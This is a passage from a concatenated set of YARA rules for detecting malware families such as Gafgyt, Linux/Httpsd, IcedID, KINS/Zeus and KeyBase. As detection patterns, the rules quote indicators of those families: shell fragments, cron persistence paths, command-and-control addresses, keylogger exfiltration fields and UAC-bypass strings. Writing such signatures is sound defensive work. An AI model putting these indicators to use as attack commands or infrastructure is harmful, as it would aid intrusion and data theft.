= { 5933ffeb1fff75100fb7450c50a1d860 } /* Opcode */ $op644 = { a1d860440057ff7508ff909001000083 } /* Opcode */ $op645 = { a1d860440057ff7508ff909001000083 } /* Opcode */ $op646 = { e4a34200c78424b0 } /* Opcode */ $op647 = { ff7518ff75145753ff90b0 } /* Opcode */ $op648 = { 1ca44200c78424c0 } /* Opcode */ $op649 = { 8d8500feffff689869430068ff } /* Opcode */ $op650 = { a3594000c7814404000014864100c781 } /* Opcode */ $op651 = { 598b0685c0740e50ff7608e8b7ffffff } /* Opcode */ $op652 = { a1d860440056ff9068010000a1d86044 } /* Opcode */ $op653 = { 897424688974246cff905001000085c0 } /* Opcode */ $op654 = { f8014300c78424ec } /* Opcode */ $op655 = { 83c40ceb2aff7308508d471450a1d860 } /* Opcode */ $op656 = { 83c41084db7510a1d8604400682cfe42 } /* Opcode */ $op657 = { 8b450cff742414668378023f50a1d860 } /* Opcode */ $op658 = { 24e84200c78424d4 } /* Opcode */ $op659 = { 595f5e8ac35bc9c3558bec83ec1ca1d8 } /* Opcode */ $op660 = { e0014300c78424e4 } /* Opcode */ $op661 = { 83c40c5e5b5fc9c3558bec5151a1d860 } /* Opcode */ $op662 = { fc004300c78424a8 } /* Opcode */ $op663 = { eb16ff71080fbfca83c04c5150a1d860 } /* Opcode */ $op664 = { 88964300c78424a0 } /* Opcode */ $op665 = { cce64200c7842488 } /* Opcode */ $op666 = { 83c40c5f33c05e5dc38b4c24040fbe41 } /* Opcode */ $op667 = { b8014300c78424d8 } /* Opcode */ $op668 = { 6868f24300ff75fcff91500300008b0d } /* Opcode */ $op669 = { 8b433a8b4dfc8d048803c650a1d86044 } /* Opcode */ $op670 = { ea4200c784243c01000010ea4200c784 } /* Opcode */ $op671 = { 83c42085ff750433c0eb4b8b763a8d44 } /* Opcode */ $op672 = { 24a44200c78424c4 } /* Opcode */ $op673 = { 83c40cff7588ff7508a1d8604400ff90 } /* Opcode */ $op674 = { 7c2a4400c78424c0 } /* Opcode */ $op675 = { 8b4300c78424540b00000c8b4300c784 } /* Opcode */ $op676 = { 50a1d860440057681cb14300682cb143 } /* Opcode */ $op677 = { f8234400c7842494 } /* Opcode */ $op678 = { 808d45f850a1d86044006a00ff902001 } /* Opcode */ $op679 = { 8b463a03c350a1d8604400ff90780200 } /* Opcode */ $op680 = { ff7608a1d8604400ff901c0100008bd8 } /* Opcode */ $op681 = { ff45fc817dfc102700000f8ffb } /* Opcode */ $op682 = { 740ac7050461440006 } /* Opcode */ $op683 = { 7a4300c784245c0600001c7a4300c784 } /* Opcode */ $op684 = { 94004300c7842498 } /* Opcode */ $op685 = { 9c4300c784243c0200000c9c4300c784 } /* Opcode */ $op686 = { a1d86044006a006828c84300ff7508ff } /* Opcode */ $op687 = { 70524300c78424c4 } /* Opcode */ $op688 = { d6e94000c781b801000076d14000c781 } /* Opcode */ $op689 = { 598d440002506844c743006a016a008d } /* Opcode */ $op690 = { 598d440002508b442434576840474400 } /* Opcode */ $op691 = { a1d860440057ff7508ff9090010000ff } /* Opcode */ $op692 = { 88dd4200c78424b4 } /* Opcode */ $op693 = { 50a1d86044005668005043005653ff90 } /* Opcode */ $op694 = { 98534300c78424ec } /* Opcode */ $op695 = { 8b44240c83c04468dc68430050a1d860 } /* Opcode */ $op696 = { 5068000010808d44245050a1d8604400 } /* Opcode */ $op697 = { 98014300c78424d0 } /* Opcode */ $op698 = { 3c014300c78424b8 } /* Opcode */ $op699 = { 9c514300c78424a0 } /* Opcode */ $op700 = { 59ff75e8ff7508a1d8604400ff909001 } /* Opcode */ $op701 = { e9aafeffffa1d86044006a006affff50 } /* Opcode */ $op702 = { ff742414a1d8604400ff7508ff903404 } /* Opcode */ $op703 = { bbd03f00003bf36a010f8e9f } /* Opcode */ $op704 = { 2cde4200c78424e4 } /* Opcode */ $op705 = { 28114300c78424a8 } /* Opcode */ $op706 = { 38a34200c7842490 } /* Opcode */ $op707 = { 38a44200c78424cc } /* Opcode */ $op708 = { 682c43440050a1d860440053ff902c03 } /* Opcode */ $op709 = { f8dc4200c7842494 } /* Opcode */ $op710 = { ff0500a04200a2c3604400a1d8604400 } /* Opcode */ $op711 = { 68b0444300ff7588a1d8604400ff9020 } /* Opcode */ $op712 = { 50ff750ca1d860440057ff9094 } /* Opcode */ $op713 = { 242b4400c78424d8 } /* Opcode */ $op714 = { 833dfc60440000750ac705fc6044006c } /* Opcode */ $op715 = { 68a34200c7842498 } /* Opcode */ $op716 = { cce74200c78424c4 } /* Opcode */ $op717 = { 83c41485c00f8440feffffc7461004 } /* Opcode */ $op718 = { 83c40c8d34463b5d1474024646433b5d } /* Opcode */ $op719 = { e0a34200c78424ac } /* Opcode */ $op720 = { 8b75108b363bf30f8d92 } /* Opcode */ $op721 = { e8014300c78424e8 } /* Opcode */ $op722 = { 38024300c78424fc } /* Opcode */ $op723 = { 0c524300c78424b4 } /* Opcode */ $op724 = { 60e74200c78424ac } /* Opcode */ $op725 = { d8dc4200c7842488 } /* Opcode */ $op726 = { 3c244400c78424b4 } /* Opcode */ $op727 = { 6a2f8d45b850ff757ca1d8604400c745 } /* Opcode */ $op728 = { 6683780a3a0f85b6 } /* Opcode */ $op729 = { b0534300c78424f0 } /* Opcode */ $op730 = { 68c8414300ff75b8a1d8604400ff9020 } /* Opcode */ $op731 = { 44124300c78424f8 } /* Opcode */ $op732 = { 78244400c78424cc } /* Opcode */ $op733 = { 8d8500feffff686c69430068ff } /* Opcode */ $op734 = { 7c014300c78424c4 } /* Opcode */ $op735 = { a1d86044005653ff909001000083c41c } /* Opcode */ $op736 = { 65fb4000c7811402000051624100c781 } /* Opcode */ $op737 = { ff751050ff7508a1d8604400ff902c03 } /* Opcode */ $op738 = { ff75f88d431050ff7508a1d8604400ff } /* Opcode */ $op739 = { 8b55148b1285d20f8c1f0100000fbf70 } /* Opcode */ $op740 = { 58024300c78424000100007c024300c7 } /* Opcode */ $op741 = { 84014300c78424c8 } /* Opcode */ $op742 = { 83c40c433b5d148d7446027cd233c066 } /* Opcode */ $op743 = { 50a1d8604400ff90a402000083c41ceb } /* Opcode */ $op744 = { 70dd4200c78424ac } /* Opcode */ $op745 = { 7cdd4200c78424b0 } /* Opcode */ $op746 = { ff742444894424588b44242c83c04450 } /* Opcode */ $op747 = { 50a1d86044005768e4a743006814a943 } /* Opcode */ $op748 = { cc2b4400c78424ec } /* Opcode */ $op749 = { a4114300c78424cc } /* Opcode */ $op750 = { 68f05a44008945f0578d45f050a1d860 } /* Opcode */ $op751 = { 1f4400c7842490030000101f4400c784 } /* Opcode */ $op752 = { 38294400c7842490 } /* Opcode */ $op753 = { dc2b4400c78424f0 } /* Opcode */ $op754 = { 9a4300c78424a8010000089a4300c784 } /* Opcode */ $op755 = { 8b44242083c00450ff7508a1d8604400 } /* Opcode */ $op756 = { 595f5ec9c3558bec83ec2c6a0b8d45d4 } /* Opcode */ $op757 = { 598d44000250536a016a008d45ec50ff } /* Opcode */ $op758 = { e4e84200c7842400010000fce84200c7 } /* Opcode */ $op759 = { 8b75108b363bf20f8dd5 } /* Opcode */ $op760 = { 8a44242783c4145f5e5b8be55dc3558b } /* Opcode */ $op761 = { 8a44242783c4145f5e5b8be55dc3558b } /* Opcode */ $op762 = { 08e84200c78424d0 } /* Opcode */ $op763 = { 54004300c7842488 } /* Opcode */ $op764 = { 8b45f40145f02945ec83c40cff45fc8b } /* Opcode */ $op765 = { ece64200c7842490 } /* Opcode */ $op766 = { 59a1d86044005653ff75f8ff90d40300 } /* Opcode */ $op767 = { 59a1d8604400536808b3430056c745c8 } /* Opcode */ $op768 = { 30a44200c78424c8 } /* Opcode */ $op769 = { c4244400c78424e4 } /* Opcode */ $op770 = { ff45fc817dfce80300000f8fac } /* Opcode */ $op771 = { c4a34200c78424a8 } /* Opcode */ $op772 = { e56d4100c781880200004e9e4100c781 } /* Opcode */ $op773 = { 30964300c7842484 } /* Opcode */ $op774 = { 0f8252ffffffa1d860440053ff7508ff } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 900KB and ( 5 of ($s*) )and 1 of ($op*) ) or ( all of them ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Gafgyt_Botnet_generic : MALW { meta: description = "Gafgyt Trojan" author = "Joan Soriano / @joanbtl" date = "2017-05-01" version = "1.0" MD5 = "e3fac853203c3f1692af0101eaad87f1" SHA1 = "710781e62d49419a3a73624f4a914b2ad1684c6a" strings: $etcTZ = "/bin/busybox;echo -e 'gayfgt'" $s2 = "/proc/net/route" $s3 = "admin" $s4 = "root" condition: $etcTZ and $s2 and $s3 and $s4 } rule Gafgyt_Botnet_oh : MALW { meta: description = "Gafgyt Trojan" author = "Joan Soriano / @joanbtl" date = "2017-05-025" version = "1.0" MD5 = "97f5edac312de349495cb4afd119d2a5" SHA1 = "916a51f2139f11e8be6247418dca6c41591f4557" strings: $s1 = "busyboxterrorist" $s2 = "BOGOMIPS" $s3 = "124.105.97.%d" $s4 = "fucknet" condition: $s1 and $s2 and $s3 and $s4 } rule Gafgyt_Botnet_bash : MALW { meta: description = "Gafgyt Trojan" author = "Joan Soriano / @joanbtl" date = "2017-05-25" version = "1.0" MD5 = "c8d58acfe524a09d4df7ffbe4a43c429" SHA1 = "b41fefa8470f3b3657594af18d2ea4f6ac4d567f" strings: $s1 = "PONG!" $s2 = "GETLOCALIP" $s3 = "HTTPFLOOD" $s4 = "LUCKYLILDUDE" condition: $s1 and $s2 and $s3 and $s4 } rule Gafgyt_Botnet_hoho : MALW { meta: description = "Gafgyt Trojan" author = "Joan Soriano / @joanbtl" date = "2017-05-25" version = "1.0" MD5 = "369c7c66224b343f624803d595aa1e09" SHA1 = "54519d2c124cb536ed0ddad5683440293d90934f" strings: $s1 = "PING" $s2 = "PRIVMSG" $s3 = "Remote IRC Bot" $s4 = "23.95.43.182" condition: $s1 and $s2 and $s3 and $s4 } rule Gafgyt_Botnet_jackmy : MALW { meta: description = "Gafgyt Trojan" author = "Joan Soriano / @joanbtl" date = "2017-05-25" version = "1.0" MD5 = "419b8a10a3ac200e7e8a0c141b8abfba" SHA1 = "5433a5768c5d22dabc4d133c8a1d192d525939d5" strings: $s1 = "PING" $s2 = "PONG" $s3 = "jackmy" $s4 = "203.134.%d.%d" condition: $s1 and $s2 and $s3 and $s4 } rule Gafgyt_Botnet_HIHI: MALW { meta: description = "Gafgyt Trojan" author = "Joan Soriano / @joanbtl" date = "2017-05-01" version = "1.0" MD5 = "cc99e8dd2067fd5702a4716164865c8a" SHA1 = "b9b316c1cc9f7a1bf8c70400861de08d95716e49" strings: $s1 = "PING" $s2 = "PONG" $s3 = "TELNET LOGIN CRACKED - %s:%s:%s" $s4 = "ADVANCEDBOT" $s5 = "46.166.185.92" $s6 = "LOLNOGTFO" condition: $s1 and $s2 and $s3 and $s4 and $s5 and $s6 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule genome { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2014-09-07" description = "Identify Genome" strings: $s1 = "Attempting to create more than one keyboard::Monitor instance" $s2 = "{Right windows}" $s3 = "Access violation - no RTTI data!" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" private rule GlassesCode : Glasses Family { meta: description = "Glasses code features" author = "Seth Hardy" last_modified = "2021-11-18" reference_file = "aaf262fde1738dbf0bb50213a9624cd6705ebcaeb06c5fcaf7e9f33695d3fc33" reference_url = "https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/" strings: $ = { B8 AB AA AA AA F7 E1 D1 EA 8D 04 52 2B C8 } $ = { B8 56 55 55 55 F7 E9 8B 4C 24 1C 8B C2 C1 E8 1F 03 D0 49 3B CA } condition: any of them } rule GlassesStrings : Glasses Family { meta: description = "Strings used by Glasses" author = "Seth Hardy" last_modified = "2021-11-18" reference_file = "aaf262fde1738dbf0bb50213a9624cd6705ebcaeb06c5fcaf7e9f33695d3fc33" reference_url = "https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/" strings: $ = "thequickbrownfxjmpsvalzydg" $ = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)" $ = "\" target=\"NewRef\"></a>" condition: all of them } rule Glasses : Family { meta: description = "Glasses family" author = "Seth Hardy" last_modified = "2021-11-18" reference_file = "aaf262fde1738dbf0bb50213a9624cd6705ebcaeb06c5fcaf7e9f33695d3fc33" reference_url = "https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/" condition: GlassesCode and GlassesStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule GoziRule : Gozi Family { meta: description = "Win32.Gozi" author = "CCN-CERT" version = "1.0" ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html" strings: $ = {63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 6F 00 75 00 72 00 6E 00 61 00 6C 00 00 00 4F 50 45 52 41 2E 45 58 45 00} condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Grozlex : Stealer { meta: author="Kevin Falcoz" date="20/08/2013" description="Grozlex Stealer - Possible HCStealer" strings: $signature={4C 00 6F 00 67 00 73 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 65 00 64 00 20 00 62 00 79 00 20 00 69 00 43 00 6F 00 7A 00 65 00 6E} condition: $signature } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Hsdfihdf: banking malware { meta: author = "Adam Ziaja <adam@adamziaja.com> http://adamziaja.com" date = "2014-04-06" description = "Polish banking malware" hash0 = "db1675c74a444fd35383d9a45631cada" hash1 = "f48ba39df38056449a3e9a1a7289f657" filetype = "exe" strings: $s0 = "ANSI_CHARSET" $s1 = "][Vee_d_[" $s2 = "qfcD:6<" $s3 = "%-%/%1%3%5%7%9%;%" $s4 = "imhzxsc\\WWKD<.)w" $s5 = "Vzlarf\\]VOZVMskf" $s6 = "JKWFAp\\Z" $s7 = "<aLLwhg" $s8 = "bdLeftToRight" $s9 = "F/.pTC7" $s10 = "O><8,)-$ " $s11 = "mjeUB>D.'8)5\\\\vhe[" $s12 = "JGiVRk[W]PL(" $s13 = "zwWNNG:8" $s14 = "zv7,'$" $a0 = "#hsdfihdf" $a1 = "polska.irc.pl" $b0 = "firehim@o2.pl" $b1 = "firehim@go2.pl" $b2 = "firehim@tlen.pl" $c0 = "cyberpunks.pl" $c1 = "kaper.phrack.pl" $c2 = "serwer.uk.to" $c3 = "ns1.ipv4.hu" $c4 = "scorebot.koth.hu" $c5 = "esopoland.pl" condition: 14 of ($s*) or all of ($a*) or 1 of ($b*) or 2 of ($c*) } /* Yara rule to detect Linux/Httpsd generic This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ private rule is__LinuxHttpsdStrings { meta: description = "Strings of ELF Linux/Httpsd (backdoor, downloader, remote command execution)" ref1 = "https://imgur.com/a/8mFGk" ref2 = "https://otx.alienvault.com/pulse/5a49115f93199b171b90a212" ref3 = "https://misppriv.circl.lu/events/view/9952" author = "unixfreaxjp" org = "MalwareMustDie" date = "2018-01-02" sha256 = "dd1266561fe7fcd54d1eb17efbbb6babaa9c1f44b36cef6e06052e22ce275ccd" sha256 = "1b3718698fae20b63fbe6ab32411a02b0b08625f95014e03301b49afaee9d559" strings: $st01 = "k.conectionapis.com" fullword nocase wide ascii $st02 = "key=%s&host_name=%s&cpu_count=%d&os_type=%s&core_count=%s" fullword nocase wide ascii $st03 = "id=%d&result=%s" fullword nocase wide ascii $st04 = "rtime" fullword nocase wide ascii $st05 = "down" fullword nocase wide ascii $st06 = "cmd" fullword nocase wide ascii $st07 = "0 */6 * * * root" fullword nocase wide ascii $st08 = "/etc/cron.d/httpsd" fullword nocase wide ascii $st09 = "cat /proc/cpuinfo |grep processor|wc -l" fullword nocase wide ascii $st10 = "k.conectionapis.com" fullword nocase wide ascii $st11 = "/api" fullword nocase wide ascii $st12 = "/tmp/.httpslog" fullword nocase wide ascii $st13 = "/bin/.httpsd" fullword nocase wide ascii $st14 = "/tmp/.httpsd" fullword nocase wide ascii $st15 = "/tmp/.httpspid" fullword nocase wide ascii $st16 = "/tmp/.httpskey" fullword nocase wide ascii condition: all of them } rule Linux_Httpsd_malware_ARM { meta: description = "Detects Linux/Httpsd ARMv5" date = "2017-12-31" strings: $hexsts01 = { f0 4f 2d e9 1e db 4d e2 ec d0 4d e2 01 40 a0 e1 } // main $hexsts02 = { f0 45 2d e9 0b db 4d e2 04 d0 4d e2 3c 01 9f e5 } // self-rclocal $hexsts03 = { f0 45 2d e9 01 db 4d e2 04 d0 4d e2 bc 01 9f e5 } // copy-self condition: all of them and is__elf and is__LinuxHttpsdStrings and filesize < 200KB } rule Linux_Httpsd_malware_i686 { meta: description = "Detects ELF Linux/Httpsd i686" date = "2018-01-02" strings: $hexsts01 = { 8d 4c 24 04 83 e4 f0 ff 71 fc 55 89 e5 57 56 53 } // main $hexsts02 = { 55 89 e5 57 56 53 81 ec 14 2c 00 00 68 7a 83 05 } // self-rclocal $hexsts03 = { 55 89 e5 57 56 53 81 ec 10 04 00 00 68 00 04 00 } // copy-self condition: all of them and is__elf and is__LinuxHttpsdStrings and filesize < 200KB } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule IMulerCode : IMuler Family { meta: description = "IMuler code tricks" author = "Seth Hardy" last_modified = "2014-06-16" strings: // Load these function strings 4 characters at a time. These check the first two blocks: $L4_tmpSpotlight = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 53 70 6F } $L4_TMPAAABBB = { C7 ?? ?? ?? ?? ?? 54 4D 50 41 C7 ?? ?? ?? ?? ?? 41 41 42 42 } $L4_FILEAGENTVer = { C7 ?? 46 49 4C 45 C7 ?? 04 41 47 45 4E } $L4_TMP0M34JDF8 = { C7 ?? ?? ?? ?? ?? 54 4D 50 30 C7 ?? ?? ?? ?? ?? 4D 33 34 4A } $L4_tmpmdworker = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 2E 6D 64 } condition: any of ($L4*) } rule IMulerStrings : IMuler Family { meta: description = "IMuler Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-16" strings: $ = "/cgi-mac/" $ = "xnocz1" $ = "checkvir.plist" $ = "/Users/apple/Documents/mac back" $ = "iMuler2" $ = "/Users/imac/Desktop/macback/" $ = "xntaskz.gz" $ = "2wmsetstatus.cgi" $ = "launch-0rp.dat" $ = "2wmupload.cgi" $ = "xntmpz" $ = "2wmrecvdata.cgi" $ = "xnorz6" $ = "2wmdelfile.cgi" $ = "/LanchAgents/checkvir" $ = "0PERA:%s" $ = "/tmp/Spotlight" $ = "/tmp/launch-ICS000" condition: any of them } rule IMuler : Family { meta: description = "IMuler" author = "Seth Hardy" last_modified = "2014-06-16" condition: IMulerCode or IMulerStrings } /* Yara rule to detect IcedID banking trojan generic This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule IceID_Bank_trojan { meta: description = "Detects IcedID..adjusted several times" author = "unixfreaxjp" org = "MalwareMustDie" date = "2018-01-14" strings: $header = { 4D 5A } $magic1 = { E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? } $st01 = "CCmdTarget" fullword nocase wide ascii $st02 = "CUserException" fullword nocase wide ascii $st03 = "FileType" fullword nocase wide ascii $st04 = "FlsGetValue" fullword nocase wide ascii $st05 = "AVCShellWrapper@@" fullword nocase wide ascii $st06 = "AVCCmdTarget@@" fullword nocase wide ascii $st07 = "AUCThreadData@@" fullword nocase wide ascii $st08 = "AVCUserException@@" fullword nocase wide ascii condition: $header at 0 and all of ($magic*) and 6 of ($st0*) and pe.sections[0].name contains ".text" and pe.sections[1].name contains ".rdata" and pe.sections[2].name contains ".data" and pe.sections[3].name contains ".rsrc" and pe.characteristics & pe.EXECUTABLE_IMAGE and pe.characteristics & pe.RELOCS_STRIPPED } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule iexpl0reCode : iexpl0ree Family { meta: description = "iexpl0re code features" author = "Seth Hardy" last_modified = "2014-07-21" strings: $ = { 47 83 FF 64 0F 8C 6D FF FF FF 33 C0 5F 5E 5B C9 C3 } $ = { 80 74 0D A4 44 41 3B C8 7C F6 68 04 01 00 00 } $ = { 8A C1 B2 07 F6 EA 30 04 31 41 3B 4D 10 7C F1 } $ = { 47 83 FF 64 0F 8C 79 FF FF FF 33 C0 5F 5E 5B C9 C3 } // 88h decrypt $ = { 68 88 00 00 00 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 } $ = { BB 88 00 00 00 53 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 } condition: any of them } rule iexpl0reStrings : iexpl0re Family { meta: description = "Strings used by iexpl0re" author = "Seth Hardy" last_modified = "2014-07-21" strings: $ = "%USERPROFILE%\\IEXPL0RE.EXE" $ = "\"<770j ((" $ = "\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IEXPL0RE.LNK" $ = "\\Documents and Settings\\%s\\Application Data\\Microsoft\\Internet Explorer\\IEXPL0RE.EXE" $ = "LoaderV5.dll" // stage 2 $ = "POST /index%0.9d.asp HTTP/1.1" $ = "GET /search?n=%0.9d&" $ = "DUDE_AM_I_SHARP-3.14159265358979x6.626176" $ = "WHO_A_R_E_YOU?2.99792458x1.25663706143592" $ = "BASTARD_&&_BITCHES_%0.8x" $ = "c:\\bbb\\eee.txt" condition: any of them } rule iexpl0re : Family { meta: description = "iexpl0re family" author = "Seth Hardy" last_modified = "2014-07-21" condition: iexpl0reCode or iexpl0reStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Insta11Code : Insta11 Family { meta: description = "Insta11 code features" author = "Seth Hardy" last_modified = "2014-06-23" strings: // jmp $+5; push 423h $jumpandpush = { E9 00 00 00 00 68 23 04 00 00 } condition: any of them } rule Insta11Strings : Insta11 Family { meta: description = "Insta11 Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-23" strings: $ = "XTALKER7" $ = "Insta11 Microsoft" wide ascii $ = "wudMessage" $ = "ECD4FC4D-521C-11D0-B792-00A0C90312E1" $ = "B12AE898-D056-4378-A844-6D393FE37956" condition: any of them } rule Insta11 : Family { meta: description = "Insta11" author = "Seth Hardy" last_modified = "2014-06-23" condition: Insta11Code or Insta11Strings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Intel_Virtualization_Wizard_exe { meta: author = "cabrel@zerklabs.com" description = "Dynamic DLL abuse executable" file_1_seen = "2013-05-21" file_1_sha256 = "7787757ae851f4a162f46f794be1532ab78e1928185212bdab83b3106f28c708" strings: $a = {4C 6F 61 64 53 54 52 49 4E 47} $b = {49 6E 69 74 69 61 6C 69 7A 65 4B 65 79 48 6F 6F 6B} $c = {46 69 6E 64 52 65 73 6F 75 72 63 65 73} $d = {4C 6F 61 64 53 54 52 49 4E 47 46 72 6F 6D 48 4B 43 55} $e = {68 63 63 75 74 69 6C 73 2E 44 4C 4C} condition: all of them } rule Intel_Virtualization_Wizard_dll { meta: author = "cabrel@zerklabs.com" description = "Dynamic DLL (Malicious)" file_1_seen = "2013-05-21" file_1_sha256 = "485ae043b6a5758789f1d33766a26d8b45b9fde09cde0512aa32d4bd1ee04f28" strings: $a = {48 3A 5C 46 61 73 74 5C 50 6C 75 67 28 68 6B 63 6D 64 29 5C} $b = {64 6C 6C 5C 52 65 6C 65 61 73 65 5C 48 69 6A 61 63 6B 44 6C 6C 2E 70 64 62} condition: ($a and $b) and Intel_Virtualization_Wizard_exe } rule IotReaper: MALW { meta: description = "Linux.IotReaper" author = "Joan Soriano / @w0lfvan" date = "2017-10-30" version = "1.0" MD5 = "95b448bdf6b6c97a33e1d1dbe41678eb" SHA256 = "b463ca6c3ec7fa19cd318afdd2fa2365fa9e947771c21c4bd6a3bc2120ba7f28" strings: $a = "weruuoqweiur.com" $b = "rm -f /tmp/ftpupload.sh \n" $c = "%02x-%02x-%02x-%02x-%02x-%02x" condition: all of them } rule Backdoor_Jolob { meta: maltype = "Backdoor.Jolob" ref = "https://github.com/reed1713" reference = "http://www.symantec.com/connect/blogs/new-flash-zero-day-linked-yet-more-watering-hole-attacks" description = "the backdoor registers an auto start service with the display name \"Network Access Management Agent\" pointing to the dll netfilter.dll. This is accomplished without notifying the user via the sysprep UAC bypass method." strings: $type = "Microsoft-Windows-Security-Auditing" $eventid = "4673" $data1 = "Security" $data2 = "SeCreateGlobalPrivilege" $data3 = "Windows\\System32\\sysprep\\sysprep.exe" nocase $type1 = "Microsoft-Windows-Security-Auditing" $eventid1 = "4688" $data4 = "Windows\\System32\\sysprep\\sysprep.exe" nocase $type2 = "Service Control Manager" $eventid2 = "7036" $data5 = "Network Access Management Agent" $data6 = "running" $type3 = "Service Control Manager" $eventid3 = "7045" $data7 = "Network Access Management Agent" $data8 = "user mode service" $data9 = "auto start" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule KINS_dropper : dropper { meta: author = "AlienVault Labs aortega@alienvault.com" description = "Match protocol, process injects and windows exploit present in KINS dropper" reference = "http://goo.gl/arPhm3" strings: // Network protocol $n1 = "tid=%d&ta=%s-%x" fullword $n2 = "fid=%d" fullword $n3 = "%[^.].%[^(](%[^)])" fullword // Injects $i0 = "%s [%s %d] 77 %s" $i01 = "Global\\%s%x" $i1 = "Inject::InjectProcessByName()" $i2 = "Inject::CopyImageToProcess()" $i3 = "Inject::InjectProcess()" $i4 = "Inject::InjectImageToProcess()" $i5 = "Drop::InjectStartThread()" // UAC bypass $uac1 = "ExploitMS10_092" $uac2 = "\\globalroot\\systemroot\\system32\\tasks\\" ascii wide $uac3 = "<RunLevel>HighestAvailable</RunLevel>" ascii wide condition: 2 of ($n*) and 2 of ($i*) and 2 of ($uac*) } rule KINS_DLL_zeus { meta: author = "AlienVault Labs aortega@alienvault.com" description = "Match default bot in KINS leaked dropper, Zeus" reference = "http://goo.gl/arPhm3" strings: // Network protocol $n1 = "%BOTID%" fullword $n2 = "%opensocks%" fullword $n3 = "%openvnc%" fullword $n4 = /Global\\(s|v)_ev/ fullword // Crypted strings $s1 = "\x72\x6E\x6D\x2C\x36\x7D\x76\x77" $s2 = "\x18\x04\x0F\x12\x16\x0A\x1E\x08\x5B\x11\x0F\x13" $s3 = "\x39\x1F\x01\x07\x15\x19\x1A\x33\x19\x0D\x1F" $s4 = "\x62\x6F\x71\x78\x63\x61\x7F\x69\x2D\x67\x79\x65" $s5 = "\x6F\x69\x7F\x6B\x61\x53\x6A\x7C\x73\x6F\x71" condition: all of ($n*) and 1 of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule KelihosHlux { meta: author = "@malpush" maltype = "KelihosHlux" description = "http://malwared.ru" date = "22/02/2014" strings: $KelihosHlux_HexString = { 73 20 7D 8B FE 95 E4 12 4F 3F 99 3F 6E C8 28 26 C2 41 D9 8F C1 6A 72 A6 CE 36 0F 73 DD 2A 72 B0 CC D1 07 8B 2B 98 73 0E 7E 8C 07 DC 6C 71 63 F4 23 27 DD 17 56 AE AB 1E 30 52 E7 54 51 F7 20 ED C7 2D 4B 72 E0 77 8E B4 D2 A8 0D 8D 6A 64 F9 B7 7B 08 70 8D EF F3 9A 77 F6 0D 88 3A 8F BB C8 89 F5 F8 39 36 BA 0E CB 38 40 BF 39 73 F4 01 DC C1 17 BF C1 76 F6 84 8F BD 87 76 BC 7F 85 41 81 BD C6 3F BC 39 BD C0 89 47 3E 92 BD 80 60 9D 89 15 6A C6 B9 89 37 C4 FF 00 3D 45 38 09 CD 29 00 90 BB B6 38 FD 28 9C 01 39 0E F9 30 A9 66 6B 19 C9 F8 4C 3E B1 C7 CB 1B C9 3A 87 3E 8E 74 E7 71 D1 } condition: $KelihosHlux_HexString } rule MALW_KeyBase { meta: description = "Identifies KeyBase aka Kibex." author = "@bartblaze" date = "2019-02" tlp = "White" strings: $s1 = " End:]" ascii wide $s2 = "Keystrokes typed:" ascii wide $s3 = "Machine Time:" ascii wide $s4 = "Text:" ascii wide $s5 = "Time:" ascii wide $s6 = "Window title:" ascii wide $x1 = "&application=" ascii wide $x2 = "&clipboardtext=" ascii wide $x3 = "&keystrokestyped=" ascii wide $x4 = "&link=" ascii wide $x5 = "&username=" ascii wide $x6 = "&windowtitle=" ascii wide $x7 = "=drowssap&" ascii wide $x8 = "=emitenihcam&" ascii wide condition: uint16(0) == 0x5a4d and 